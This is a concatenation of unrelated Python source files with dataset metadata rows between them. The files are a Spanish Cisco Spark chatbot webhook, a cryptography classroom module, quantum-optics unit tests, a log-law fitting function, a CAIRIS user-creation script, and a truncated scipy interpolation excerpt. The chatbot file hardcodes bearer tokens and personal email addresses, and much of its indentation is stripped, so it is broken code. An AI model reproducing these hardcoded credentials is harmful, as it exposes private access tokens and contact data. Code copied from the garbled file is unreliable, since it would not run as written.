bot_token = "MDc0OWJkYjgtZWM4Yy00MzgyLThmNDAtNzQ2ZDliMmE1Y2VkMmE5ODM3OWQtMDQ1"
    # Access data for a moderator (myself by default). Useful because the bot has certain
    # data-access restrictions (configured by Cisco for security reasons)
moderator_token = "YjI2NDhkMTYtYjkxMS00ZGYwLWIxNjQtYzQyYTIwOTVhNWI3NDU0YmY2OTYtZjYx"
if req.get("result").get("action") == "creaSala":
creaSalaSpark(moderator_token)
elif req.get("result").get("action") == "creaGrupo":
creaGrupoSpark()
elif req.get("result").get("action") == "llama":
llamaSala()
elif req.get("result").get("action") == "gestionado":
dato = leeExcel(req)
elif req.get("result").get("action") == "Inventario":
dato = leeInventario(req)
elif req.get("result").get("action") == "Ayuda":
dato = get_room_sessions_id(req, bot_token, moderator_token)
texto = help_definition()
status = post_message_markDown(dato, bot_token,texto)
dato = proporcionaAyuda(req)
elif req.get("result").get("action") == "InformacionSala":
dato = get_room_sessions_id(req,bot_token,moderator_token)
status = post_message(dato, bot_token, "probando")
print (status)
else:
return {}
res = makeWebhookResult(dato)
return res
######################################################################################################################
# Actions triggered by client requests
# - Create a room.
# - Fetch information from a database.
# - Show the assistant's options.
# - ...
######################################################################################################################
def creaSalaSpark(myToken):
print("funcion creaSalaSpark iniciado")
roomTitle = "PruebaCreacionSala"
headers = {"Authorization": "Bearer " + myToken, "Content-type": "application/json"}
# Define the action to be taken in the HTTP request
roomInfo = {"title": roomTitle}
# Execute HTTP POST request to create the Spark Room
r = requests.post("https://api.ciscospark.com/v1/rooms", headers=headers, json=roomInfo)
print("funcion creaSalaSpark completado")
room = r.json()
def creaGrupoSpark():
print("funcion creaGrupoSpark iniciado")
myToken = "YjI2NDhkMTYtYjkxMS00ZGYwLWIxNjQtYzQyYTIwOTVhNWI3NDU0YmY2OTYtZjYx"
# emailFile = userlist.txt
roomTitle = "Ojete" # second argument
# Read the email file and save the emails in an list
# emails = [line.strip() for line in open(emailFile)]
emails = ["jiherrero@ttrends.es", "fsobrino@ttrends.es", "pmartin@ttrends.es", "jespejo@ttrends.es",
"jmvarelad@gmail.com"]
print("funcion creaGrupoSpark, paso2")
# Define header used for authentication
headers = {"Authorization": "Bearer " + myToken,
"Content-type": "application/json"}
# Define the action to be taken in the HTTP request
roomInfo = {"title": roomTitle}
# Execute HTTP POST request to create the Spark Room
r = requests.post("https://api.ciscospark.com/v1/rooms", headers=headers, json=roomInfo)
room = r.json()
# Print the result of the HTTP POST request
print(room)
for email in emails:
        # if it's a blank line don't add:
if email == "": continue
# Set the HTTP request payload (action)
membershipInfo = {"roomId": room["id"],
"personEmail": email}
# Execute HTTP POST request to create the Spark Room
r = requests.post("https://api.ciscospark.com/v1/memberships",
headers=headers, json=membershipInfo)
membership = r.json()
print(membership)
print()
def llamaSala():
new = 2 # open in a new tab, if possible
# open a public URL, in this case, the webbrowser docs
# url = "http://expansion.es"
url = "https://pxdemo.ttrends.es/webapp/#/?conference=jiherrero@ttrends.es"
webbrowser.open(url, new=new)
# Reads information from an Excel spreadsheet
def leeExcel(req):
# print ("vamos a leer el excel")
valorBuscado = ""
result = req.get("result")
parameters = result.get("parameters")
nombreCliente = parameters.get("Clientes")
tipoInformacion = parameters.get("detalle_de_servicios_gestionados")
scope = ['https://spreadsheets.google.com/feeds']
credentials = ServiceAccountCredentials.from_json_keyfile_name('My Project-e08df21666bc.json', scope)
gc = gspread.authorize(credentials)
wks = gc.open("prueba1")
worksheet = wks.worksheet("gestionados")
cliente = worksheet.find(nombreCliente)
servicio = worksheet.find(tipoInformacion)
column = cliente.col
row = servicio.row
# print("row: ",row, "column: ",column)
valorBuscado = worksheet.cell(row, column).value
print("valor Buscado: ", valorBuscado)
return valorBuscado
def leeInventario(req):
    parameters = req.get("result").get("parameters")
    return parameters.get("datos_inventario")
######################################################################################################################
# Functions for Spark rooms
# - Get room identifiers
# - Read messages from the rooms
# - ...
######################################################################################################################
# The goal of this function is to associate the session id sent by api.ai
# with the Spark room id (which api.ai does not send).
# By mapping the session id to the room id, messages can be sent to the room
# directly and more efficiently.
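# Note: `labels` is assumed to be a module-level cache defined elsewhere in this
# file as a list of [sessionId, roomId] pairs, e.g. labels = [] initially and
# later [["api-ai-session-id", "spark-room-id"]] (illustrative values only).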
def get_room_sessions_id(req,bot_token,moderator_token):
sessionId = req.get("sessionId")
    for c in range(len(labels)):
        if (labels[c][0] == sessionId):
            print("ya dispongo del identificador de la sala, lo envio...")
            return labels[c][1]
    # Session not cached yet (or the cache is empty): resolve the room id once
    # and remember the mapping for later requests.
    roomId = informacionSala(req,bot_token,moderator_token)
    labels.append([sessionId,roomId])
    print("Anadiendo un nuevo identificador de sesion: ", sessionId, "-> con roomId: ",roomId)
    return roomId
def informacionSala(req,bot_token,moderator_token):
identificador_sala = get_bot_room_id(req,bot_token,moderator_token)
print ("el identificador de esta sala es: ", identificador_sala)
return identificador_sala
def proporcionaAyuda(req):
ayuda = "Esto es una \n prueba"
return ayuda
def get_bot_room_id(req,bot_token,moderator_token):
result = req.get("result")
ultima_peticion= result.get("resolvedQuery")
identificador_sala = get_rooms(ultima_peticion,bot_token,moderator_token)
return identificador_sala
def get_rooms(ultima_peticion,bot_token,moderator_token):
header = {'Authorization': "Bearer "+ bot_token, 'content-type': 'application/json'}
result = requests.get(url='https://api.ciscospark.com/v1/rooms', headers=header)
JSONresponse = result.json()
roomlist_array = []
for EachRoom in JSONresponse['items']:
roomlist_array.append(EachRoom.get('title') + ' ** ' + EachRoom.get('id'))
last_message = get_last_message(EachRoom.get('id'),bot_token,moderator_token)
print("Last Message:", last_message)
if (last_message.__contains__(ultima_peticion)):
return EachRoom.get('id')
return "sala no encontrada"
#print("Rooms:", roomlist_array)
def get_last_message(roomid,bot_token,moderator_token):
num_mensajes = 2
header = {'Authorization': "Bearer "+ bot_token, 'content-type': 'application/json'}
payload = {'roomId': roomid, 'max': num_mensajes}
result = requests.get(url='https://api.ciscospark.com/v1/messages', headers=header,params=payload)
    # If fetching the last message fails, the room is a group room and the bot has no
    # permission to read the messages; a moderator (not a bot) present in the group
    # room has to be used to access them.
if result.status_code != 200:
header = {'Authorization': "Bearer " + moderator_token , 'content-type': 'application/json'}
payload = {'roomId': roomid, 'max': num_mensajes}
result = requests.get(url='https://api.ciscospark.com/v1/messages', headers=header, params=payload)
    # If it fails again, we cannot get the information, and therefore cannot get the room id...
if result.status_code != 200:
return ""
JSONresponse = result.json()
messagelist_array = []
#print (JSONresponse)
for EachMessage in JSONresponse['items']:
messagelist_array.append(EachMessage.get('text'))
#print("Messages:",messagelist_array)
return messagelist_array[0]
def get_session_id(req):
session_id = req.get("sessionId")
return session_id
def post_message(roomid,bot_token,text):
header = {'Authorization': "Bearer " + bot_token, 'content-type': 'application/json'}
payload = {'roomId': roomid, 'text': text}
print("RoomId:", roomid)
print("Bottoken: ", bot_token)
result = requests.post(url='https://api.ciscospark.com/v1/messages', headers=header, json=payload)
    # If the POST fails, it is usually a group room where the bot lacks the required
    # permissions; return the error payload so the caller can inspect it.
    if result.status_code != 200:
        print("RoomId:", roomid)
        print("Bottoken: ", bot_token)
        return result.json()
    else:
        return "mensaje enviado correctamente..."
def post_message_markDown(roomid,bot_token,markdown):
header = {'Authorization': "Bearer " + bot_token, 'content-type': 'application/json'}
payload = {'roomId': roomid, 'markdown': markdown}
print("RoomId:", roomid)
print("Bottoken: ", bot_token)
result = requests.post(url='https://api.ciscospark.com/v1/messages', headers=header, json=payload)
    # If the POST fails, it is usually a group room where the bot lacks the required
    # permissions; return the error payload so the caller can inspect it.
    if result.status_code != 200:
        print("RoomId:", roomid)
        print("Bottoken: ", bot_token)
        return result.json()
    else:
        return "mensaje enviado correctamente..."
######################################################################################################################
# Definition of options and dialogs with the clients
# - Help message
# - Default message when no answer can be found.
######################################################################################################################
# Definition of the help options.
def help_definition():
text = "Hola, soy Andy! \nEstos son los temas sobre los que te puedo ayudar: \n 1. **Informes de estadisticas.**\n 2. **Informacion de inventario** \n 3. **Actas de reuniones**\n 4. **Soporte Techno Trends**"
return text
def makeWebhookResult(data):
# print ("preparando el mensaje de vuelta")
if data is None or data == "":
speech = "no he encontrado lo que me pides, por favor especifica mas tu peticion..."
else:
speech = data
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
"source": "from spark"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
|
apache-2.0
| 2,362,968,916,008,415,000
| 33.771208
| 212
| 0.640766
| false
| 3.222778
| false
| false
| false
|
wxgeo/geophar
|
wxgeometrie/modules/cryptographie/__init__.py
|
1
|
12975
|
# -*- coding: utf-8 -*-
##--------------------------------------#######
# Cryptographie #
##--------------------------------------#######
# WxGeometrie
# Dynamic geometry, graph plotter, and more for french mathematic teachers.
# Copyright (C) 2005-2013 Nicolas Pourcelot
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from string import ascii_uppercase as majuscules
from functools import partial
from random import shuffle
import re
from PyQt5.QtWidgets import QVBoxLayout, QInputDialog, QPushButton,\
QTextEdit, QGridLayout, QLabel, QLineEdit, QSpacerItem
from PyQt5.QtCore import Qt, QTimer
from ...GUI.menu import MenuBar
from ...GUI.panel import Panel_simple
from ...pylib import print_error
#~ from ... import param
dict_accents = {
"é": "E",
"É": "E",
"ê": "E",
"Ê": "E",
"è": "E",
"È": "E",
"à": "A",
"À": "A",
"â": "A",
"Â": "A",
"ô": "O",
"Ô": "O",
"î": "I",
"Î": "I",
"ù": "U",
"Ù": "U",
"û": "U",
"Û": "U",
"ç": "C",
"Ç": "C",
}
class CaseLettre(QLineEdit):
def __init__(self, parent):
self.parent = parent
QLineEdit.__init__(self, parent)
self.setAlignment(Qt.AlignCenter)
def keyPressEvent(self, evt):
self.parent.message('')
n = evt.key()
if 65 <= n <= 90 or 97 <= n <= 122:
c = chr(n).upper()
for case in self.parent.cases.values():
if case.text() == c:
self.parent.message('La lettre %s est déjà utilisée !' %c)
return
self.setText(c)
elif n in (Qt.Key_Backspace, Qt.Key_Delete):
self.clear()
##QLineEdit.keyPressEvent(self, evt)
class CryptographieMenuBar(MenuBar):
def __init__(self, panel):
MenuBar.__init__(self, panel)
self.ajouter("Fichier", ["quitter"])
self.ajouter("Affichage", ["onglet"], ["plein_ecran"])
self.ajouter("Outils",
["Coder un message", "Code le message par substitution mono-alphabétique.",
"Ctrl+K", panel.coder],
["Coder avec espaces", "Code le message en conservant les espaces (substitution mono-alphabétique).",
"Ctrl+Shift+K", partial(panel.coder, espaces=True)],
["Générer une nouvelle clé", "Générer une nouvelle permutation de l'alphabet.", None, panel.generer_cle],
["Modifier la clé", "Générer une nouvelle permutation de l'alphabet.", None, panel.DlgModifierCle],
None,
["Coder avec Vigenère", "Codage par la méthode de Vigenère (substitution poly-alphabétique).",
None, partial(panel.coder_vigenere, ask=True)],
None,
["options"])
self.ajouter("avance2")
self.ajouter("?")
class Cryptographie(Panel_simple):
titre = "Cryptographie" # Donner un titre à chaque module
def __init__(self, *args, **kw):
Panel_simple.__init__(self, *args, **kw)
self._freeze = False
self.widget_modifie = None
# La clé est la permutation de l'alphabet actuellement utilisée
# pour le codage par substitution mono-alphabétique.
self.generer_cle()
# La clé de chiffrement pour le codage par substitution poly-alphabétique
# (appelé aussi chiffre de Vigenère).
self.cle_vigenere = 'EXEMPLE'
# Signe indiquant un caractère non déchiffré
self.symbole = '-' # '.'
self.sizer = QVBoxLayout()
self.textes = QGridLayout()
self.textes.setSpacing(5)
size = (400, 300)
txt_clair = QLabel("<b>Texte en clair</b>")
self.clair = QTextEdit()
self.clair.setMinimumSize(*size)
formater_clair = partial(self.formater, widget=self.clair)
self.clair.textChanged.connect(formater_clair)
self.clair.cursorPositionChanged.connect(formater_clair)
self.copier_clair = QPushButton('Copier le texte en clair')
self.copier_clair.clicked.connect(partial(self.copier, widget=self.clair))
txt_code = QLabel("<b>Texte codé</b>")
self.code = QTextEdit()
self.code.setMinimumSize(*size)
self.code.textChanged.connect(self.code_modifie)
self.code.cursorPositionChanged.connect(partial(self.formater, widget=self.code))
self.copier_code = QPushButton('Copier le texte codé')
self.copier_code.clicked.connect(partial(self.copier, widget=self.code))
self.textes.addWidget(txt_clair, 0, 0)
self.textes.addItem(QSpacerItem(50, 1), 0, 1)
self.textes.addWidget(txt_code, 0, 2)
self.textes.addWidget(self.clair, 1, 0)
self.textes.addWidget(self.code, 1, 2)
self.textes.addWidget(self.copier_code, 2, 2)
self.textes.addWidget(self.copier_clair, 2, 0)
self.table = QGridLayout()
self.table.setSpacing(3)
self.cases = {}
self.table.addWidget(QLabel("Codé : ", self), 0, 0)
self.table.addWidget(QLabel("Clair : ", self), 1, 0)
##self.table.setColumnStretch(0, 100)
for i, l in enumerate(majuscules):
lettre = QLineEdit(l, self)
lettre.setAlignment(Qt.AlignCenter)
lettre.setReadOnly(True)
lettre.setEnabled(False)
self.table.addWidget(lettre, 0, i + 1)
##self.table.setColumnStretch(i + 1, 1)
for i, l in enumerate(majuscules):
c = self.cases[l] = CaseLettre(self)
c.setMaxLength(1)
self.table.addWidget(c, 1, i + 1)
c.textChanged.connect(self.decoder)
self.sizer.addLayout(self.textes)
self.sizer.addLayout(self.table)
self.setLayout(self.sizer)
##self.adjustSize()
self.couleur1 = "5A28BE" # sky blue
self.couleur2 = "C86400" # Lime Green
self.couleur_position = "FFCDB3"
self.reg = re.compile("([-A-Za-z]|<##>|</##>)+")
##couleur_position = wx.Color(255, 205, 179) # FFCDB3
##couleur1 = wx.Color(90, 40, 190) # 5A28BE
##couleur2 = wx.Color(200, 100, 0) # C86400
##black = wx.Color(0, 0, 0) # 000000
##white = wx.Color(255, 255, 255) # FFFFFF
##self.special = wx.TextAttr(wx.NullColour, couleur_position)
##self.fond = wx.TextAttr(couleur1, wx.NullColour) #"sky blue"
##self.fond2 = wx.TextAttr(couleur2, wx.NullColour) # "Lime Green"
##self.defaut = wx.TextAttr(black, white)
##
##self.Bind(wx.EVT_IDLE, self.OnIdle)
timer = QTimer(self)
timer.timeout.connect(self.OnIdle)
timer.start(100)
# DEBUG:
##self.code.setPlainText('WR IRAMXPZRHRDZ IK HRYYOVR AL IRYYBKY RYZ NOALWLZR POM WR NOLZ FKR W BD O VOMIR WRY YLVDRY IR PBDAZKOZLBD RZ WRY RYPOARY RDZMR WRY HBZY OWBMY FKR I QOELZKIR BD VMBKPR WRY WRZZMRY ALDF POM ALDF')
def copier(self, evt=None, widget=None):
self.vers_presse_papier(widget.toPlainText())
def DlgModifierCle(self, evt=None):
while True:
text, ok = QInputDialog.getText(self, "Modifier la clé",
"La clé doit être une permutation de l'alphabet,\n"
"ou un chiffre qui indique de combien l'alphabet est décalé.",
text=str(self.cle))
if ok:
try:
self.modifier_cle(text)
except:
print_error()
continue
break
def generer_cle(self):
l = list(majuscules)
shuffle(l)
self.cle = ''.join(l)
def modifier_cle(self, cle):
cle = cle.strip().upper()
if cle.isdigit():
n = int(cle)
cle = majuscules[n:] + majuscules[:n]
# On teste qu'il s'agit bien d'une permutation de l'alphabet:
assert ''.join(sorted(cle)) == majuscules
self.cle = cle
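    # Example: modifier_cle("3") turns the key into a plain Caesar shift,
    # since majuscules[3:] + majuscules[:3] == 'DEFGHIJKLMNOPQRSTUVWXYZABC'.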
def coder(self, evt=None, cle=None, espaces=False):
cle = (self.cle if cle is None else cle)
clair = self.clair.toPlainText().upper()
for key, val in dict_accents.items():
clair = clair.replace(key, val)
d = dict(zip(majuscules, cle))
code = ''.join(d.get(s, ' ') for s in clair)
code = re.sub(' +', ' ', code)
if not espaces:
code = code.replace(' ', '')
self.code.setPlainText(code)
return code
@staticmethod
def _vigenere(l1, l2):
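        # Both letters are uppercase ASCII (ord('A') == 65): the sum of their
        # alphabet indices, (ord(l1) - 65) + (ord(l2) - 65), is reduced modulo 26
        # and mapped back to a letter -- the classic Vigenère shift.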
return chr((ord(l1) + ord(l2) - 130)%26 + 65)
def coder_vigenere(self, evt=None, msg=None, cle=None, ask=False):
def gen():
length = len(cle)
n = 0
for car in clair:
if car.isalpha():
yield self._vigenere(cle[n%length], car)
n += 1
else:
yield car
if ask:
self.DlgModifierCleVigenere()
if cle is None:
cle = self.cle_vigenere
if msg is None:
msg = self.clair.toPlainText()
msg = msg.upper()
        # For now, spaces are not supported.
        clair = msg.replace(' ', '')
for key, val in dict_accents.items():
clair = clair.replace(key, val)
code = ''.join(gen())
self.code.setPlainText(code)
return code
def DlgModifierCleVigenere(self, evt=None):
while True:
text, ok = QInputDialog.getText(self, "Modifier la clé pour Vigenère",
"La clé doit contenir uniquement des lettres.",
text=self.cle_vigenere)
if ok:
text = text.strip()
if not text.isalpha():
continue
self.cle_vigenere = text.upper()
break
def decoder(self, txt=None):
code = self.code.toPlainText().upper()
def f(s):
if s in majuscules:
return self.cases[s].text() or self.symbole
return s
clair = ''.join(f(s) for s in code)
self.clair.setPlainText(clair)
def code_modifie(self, txt=None):
self.decoder(txt)
self.formater(txt, widget=self.code)
def formater(self, evt=None, widget=None):
##evt.Skip()
if self._freeze:
return
self.widget_modifie = widget
def _formater(self, widget_modifie):
# Impossible de formater les 2 textes de la même manière s'ils
# ne sont pas de la même longueur.
# Cela ne devrait se produire que temporairement (par ex.,
# l'utilisateur copie un nouveau texte)
if len(self.code.toPlainText()) != len(self.clair.toPlainText()):
if self.code.toPlainText() and self.clair.toPlainText():
print('Warning: le message codé et le message en clair ne sont '
'pas de même longueur.')
return
def colorier(m, col1=[self.couleur1], col2=[self.couleur2]):
s = m.group(0)
s = "<font color='#%s'>%s</font>" % (col1[0], s)
col1[0], col2[0] = col2[0], col1[0]
return s
self._freeze = True
pos = widget_modifie.textCursor().position()
for w in (self.code, self.clair):
txt = w.toPlainText()
if pos != len(txt):
txt = txt[:pos] + '<##>' + txt[pos] + '</##>' + txt[pos + 1:]
new_txt = re.sub(self.reg, colorier, txt)
new_txt = new_txt.replace("<##>",
"<font style='background-color: #%s;'>" % self.couleur_position)
new_txt = new_txt.replace("</##>", "</font>")
w.setHtml(new_txt)
cursor = widget_modifie.textCursor()
cursor.setPosition(pos)
widget_modifie.setTextCursor(cursor)
self._freeze = False
self.widget_modifie = None
def OnIdle(self, evt=None):
if self.widget_modifie is not None and not self.parent.parent.closing:
self._formater(self.widget_modifie)
|
gpl-2.0
| 2,154,801,898,003,441,000
| 35.061453
| 228
| 0.562974
| false
| 3.334194
| false
| false
| false
|
mabuchilab/QNET
|
tests/algebra/test_pauli_matrics.py
|
1
|
2399
|
"""Test for PauliX, PauliY, PauliZ"""
from sympy import I
import pytest
from qnet import (
PauliX, PauliY, PauliZ, LocalSigma, LocalSpace, LocalProjector, SpinSpace)
def test_fock_pauli_matrices():
"""Test correctness of Pauli matrices on a Fock space"""
assert PauliX(1) == LocalSigma(0, 1, hs=1) + LocalSigma(1, 0, hs=1)
assert PauliX(1) == PauliX('1') == PauliX(LocalSpace('1'))
assert PauliY(1).expand() == (
-I * LocalSigma(0, 1, hs=1) + I * LocalSigma(1, 0, hs=1))
assert PauliY(1) == PauliY('1') == PauliY(LocalSpace('1'))
assert PauliZ(1) == LocalProjector(0, hs=1) - LocalProjector(1, hs=1)
assert PauliZ(1) == PauliZ('1') == PauliZ(LocalSpace('1'))
assert PauliX(1, states=(0, 2)) == (
LocalSigma(0, 2, hs=1) + LocalSigma(2, 0, hs=1))
hs = LocalSpace("1", basis=('g', 'e', 'r'))
assert PauliX(hs) == LocalSigma(0, 1, hs=hs) + LocalSigma(1, 0, hs=hs)
assert PauliX(hs) == PauliX(hs, states=('g', 'e'))
assert PauliY(hs).expand() == (
-I * LocalSigma(0, 1, hs=hs) + I * LocalSigma(1, 0, hs=hs))
assert PauliY(hs) == PauliY(hs, states=('g', 'e'))
assert PauliZ(hs) == LocalProjector(0, hs=hs) - LocalProjector(1, hs=hs)
assert PauliZ(hs) == PauliZ(hs, states=('g', 'e'))
assert PauliX(hs, states=(0, 2)) == (
LocalSigma('g', 'r', hs=hs) + LocalSigma('r', 'g', hs=hs))
assert PauliX(hs, states=(0, 2)) == PauliX(hs, states=('g', 'r'))
def test_spin_pauli_matrices():
"""Test correctness of Pauli matrices on a spin space"""
hs = SpinSpace("s", spin='1/2', basis=('down', 'up'))
assert PauliX(hs) == (
LocalSigma('down', 'up', hs=hs) + LocalSigma('up', 'down', hs=hs))
assert PauliX(hs) == PauliX(hs, states=('down', 'up'))
assert PauliY(hs).expand() == (
-I * LocalSigma('down', 'up', hs=hs) +
I * LocalSigma('up', 'down', hs=hs))
assert PauliY(hs) == PauliY(hs, states=('down', 'up'))
assert PauliZ(hs) == (
LocalProjector('down', hs=hs) - LocalProjector('up', hs=hs))
assert PauliZ(hs) == PauliZ(hs, states=('down', 'up'))
hs = SpinSpace("s", spin=1, basis=('-', '0', '+'))
with pytest.raises(TypeError):
PauliX(hs, states=(0, 2))
assert PauliX(hs, states=('-', '+')) == (
LocalSigma('-', '+', hs=hs) + LocalSigma('+', '-', hs=hs))
assert PauliX(hs) == PauliX(hs, states=('-', '0'))
|
mit
| -3,286,054,655,234,274,000
| 43.425926
| 78
| 0.56857
| false
| 2.585129
| true
| false
| false
|
hujc91/uw-ffpg
|
pivTools/loglay_fit.py
|
1
|
1749
|
#---------- Forematters---------------------------------------------
import numpy as np
#-------------------------------------------------------------------
def loglay_fit(up, yp, ypthresL, ypthresH):
'''
Curve fit for velocity profiles in the log-law layer of a wall-bounded shear flow
u+ = a*log(y+) + b (eq.1)
Inputs:
up - dimensionless velocity scaled by inner-scaling velocity scale (u+)
yp - dimensionless coordiates scaled by inner-scaling length scale (y+)
ypthresL - lower bound of the log-law range (typical value range: [20,35])
ypthresH - upper bound of the log-law range (typical value range: [50,80])
Outputs:
u_grwrt - curve fit coefficient (a) in eq.1
u_intcp - curve fit interception (b) in eq.1
Note:
For fully developed turbulent flow over a flat surface:
a ~= 2.43
b ~ = 5.2
'''
# yplus index
idxloglay = np.where((yp>=ypthresL)&(yp<=ypthresH)==True)
# Take natural logarithm of u and y
ufit = up[idxloglay]
yfit = np.log(yp[idxloglay])
# Estimate the slope for least square regression
    idxlsq0 = int(np.max(np.argmax(ufit)))
    idxlsq1 = int(np.min(np.argmin(ufit)))
    idxlsq2 = int(np.size(ufit)/2)
du = ufit[idxlsq0]-ufit[idxlsq1]
dy = yfit[idxlsq0]-yfit[idxlsq1]
dudy = du/dy
A = np.vstack([yfit, dudy*np.ones(len(yfit))]).T
u_grwrt, u_intcp = np.linalg.lstsq(A, ufit)[0]
# Correction to the interception
u_offset0 = ufit[idxlsq0] - (u_grwrt*yfit[idxlsq0]+u_intcp)
u_offset1 = ufit[idxlsq1] - (u_grwrt*yfit[idxlsq1]+u_intcp)
u_offset2 = ufit[idxlsq2] - (u_grwrt*yfit[idxlsq2]+u_intcp)
u_intcp = u_intcp + (u_offset0 + u_offset1 + u_offset2)/3
return u_grwrt,u_intcp
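# Illustrative self-check (not part of the original module): synthetic data that
# follows u+ = 2.43*log(y+) + 5.2 exactly should be recovered by the fit.  The
# bounds 30 and 70 are typical log-law thresholds, chosen here only for the demo.
if __name__ == '__main__':
    yp_demo = np.linspace(1.0, 200.0, 400)
    up_demo = 2.43*np.log(yp_demo) + 5.2
    a_fit, b_fit = loglay_fit(up_demo, yp_demo, 30, 70)
    print('slope     (expected ~2.43):', a_fit)
    print('intercept (expected ~5.2) :', b_fit)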
|
mit
| 8,867,636,776,251,121,000
| 32.634615
| 85
| 0.600343
| false
| 2.7984
| false
| false
| false
|
nathanbjenx/cairis
|
cairis/bin/add_cairis_user.py
|
1
|
3248
|
#!/usr/bin/python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, UserMixin, RoleMixin, login_required
from flask_cors import CORS
from cairis.core.Borg import Borg
from cairis.core.MySQLDatabaseProxy import createDatabaseAccount,createDatabaseAndPrivileges,createDatabaseSchema
import cairis.core.BorgFactory
__author__ = 'Shamal Faily'
cairis.core.BorgFactory.dInitialise()
app = Flask(__name__)
app.config['DEBUG'] = True
b = Borg()
app.config['SECRET_KEY'] = b.secretKey
app.config['SECURITY_PASSWORD_HASH'] = b.passwordHash
app.config['SECURITY_PASSWORD_SALT'] = b.passwordSalt
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:' + b.rPasswd + '@' + b.dbHost + '/cairis_user'
db = SQLAlchemy(app)
cors = CORS(app)
roles_users = db.Table('roles_users', db.Column('user_id', db.Integer(), db.ForeignKey('auth_user.id')), db.Column('role_id', db.Integer(), db.ForeignKey('auth_role.id')))
class Role(db.Model, RoleMixin):
__tablename__ = 'auth_role'
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model, UserMixin):
__tablename__ = 'auth_user'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(255), unique=True)
password = db.Column(db.String(255))
name = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship('Role', secondary=roles_users, backref=db.backref('users', lazy='dynamic'))
user_datastore = SQLAlchemyUserDatastore(db,User, Role)
security = Security(app, user_datastore)
def main():
parser = argparse.ArgumentParser(description='Computer Aided Integration of Requirements and Information Security - Add CAIRIS user')
parser.add_argument('user',help='Email address')
parser.add_argument('password',help='password')
parser.add_argument('name',help='Full name')
args = parser.parse_args()
createDatabaseAccount(b.rPasswd,b.dbHost,b.dbPort,args.user,'')
createDatabaseAndPrivileges(b.rPasswd,b.dbHost,b.dbPort,args.user,'',args.user + '_default')
createDatabaseSchema(b.cairisRoot,b.dbHost,b.dbPort,args.user,'',args.user + '_default')
db.create_all()
user_datastore.create_user(email=args.user, password=args.password, name=args.name)
db.session.commit()
if __name__ == '__main__':
main()
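# Example invocation (hypothetical values):
#   python add_cairis_user.py alice@example.com S3cret! "Alice Example"
# This creates the per-user MySQL account and database, builds the CAIRIS schema,
# and registers the Flask-Security user with the given e-mail, password and name.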
|
apache-2.0
| 7,796,071,425,858,259,000
| 40.113924
| 171
| 0.740148
| false
| 3.362319
| false
| false
| false
|
maciejkula/scipy
|
scipy/interpolate/polyint.py
|
1
|
32302
|
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy.special import factorial
from scipy.lib.six import xrange
__all__ = ["KroghInterpolator", "krogh_interpolate", "BarycentricInterpolator",
"barycentric_interpolate", "PiecewisePolynomial",
"piecewise_polynomial_interpolate", "approximate_taylor_polynomial"]
def _isscalar(x):
"""Check whether x is if a scalar type, or 0-dim"""
return np.isscalar(x) or hasattr(x, 'shape') and x.shape == ()
class _Interpolator1D(object):
"""
Common features in univariate interpolation
Deal with input data type and interpolation axis rolling. The
actual interpolator can assume the y-data is of shape (n, r) where
`n` is the number of x-points, and `r` the number of variables,
and use self.dtype as the y-data type.
Attributes
----------
_y_axis
Axis along which the interpolation goes in the original array
_y_extra_shape
Additional trailing shape of the input arrays, excluding
the interpolation axis.
dtype
Dtype of the y-data arrays. Can be set via set_dtype, which
forces it to be float or complex.
Methods
-------
__call__
_prepare_x
_finish_y
_reshape_yi
_set_yi
_set_dtype
_evaluate
"""
__slots__ = ('_y_axis', '_y_extra_shape', 'dtype')
def __init__(self, xi=None, yi=None, axis=None):
self._y_axis = axis
self._y_extra_shape = None
self.dtype = None
if yi is not None:
self._set_yi(yi, xi=xi, axis=axis)
def __call__(self, x):
"""
Evaluate the interpolant
Parameters
----------
x : array-like
Points to evaluate the interpolant at.
Returns
-------
y : array-like
Interpolated values. Shape is determined by replacing
the interpolation axis in the original array with the shape of x.
"""
x, x_shape = self._prepare_x(x)
y = self._evaluate(x)
return self._finish_y(y, x_shape)
def _evaluate(self, x):
"""
Actually evaluate the value of the interpolator.
"""
raise NotImplementedError()
def _prepare_x(self, x):
"""Reshape input x array to 1-D"""
x = np.asarray(x)
if not np.issubdtype(x.dtype, np.inexact):
# Cast integers etc to floats
x = x.astype(float)
x_shape = x.shape
return x.ravel(), x_shape
def _finish_y(self, y, x_shape):
"""Reshape interpolated y back to n-d array similar to initial y"""
y = y.reshape(x_shape + self._y_extra_shape)
if self._y_axis != 0 and x_shape != ():
nx = len(x_shape)
ny = len(self._y_extra_shape)
s = (list(range(nx, nx + self._y_axis))
+ list(range(nx)) + list(range(nx+self._y_axis, nx+ny)))
y = y.transpose(s)
return y
def _reshape_yi(self, yi, check=False):
yi = np.rollaxis(np.asarray(yi), self._y_axis)
if check and yi.shape[1:] != self._y_extra_shape:
ok_shape = "%r + (N,) + %r" % (self._y_extra_shape[-self._y_axis:],
self._y_extra_shape[:-self._y_axis])
raise ValueError("Data must be of shape %s" % ok_shape)
return yi.reshape((yi.shape[0], -1))
